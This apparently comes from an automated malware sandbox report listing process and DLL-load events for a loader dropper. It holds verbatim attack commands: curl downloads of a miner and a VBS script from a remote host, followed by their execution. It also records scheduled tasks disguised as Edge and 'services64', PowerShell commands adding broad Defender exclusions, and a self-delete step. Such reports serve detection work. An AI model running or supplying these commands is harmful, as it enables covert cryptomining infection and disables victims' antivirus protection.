                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.phpJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript conf.vbsJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\services64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: mstask.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: dui70.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: duser.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: chartv.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: oleacc.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: atlthunk.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll (identical event recorded 3 times in succession)
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: wtsapi32.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: winsta.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: explorerframe.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.fileexplorer.common.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: srvcli.dll
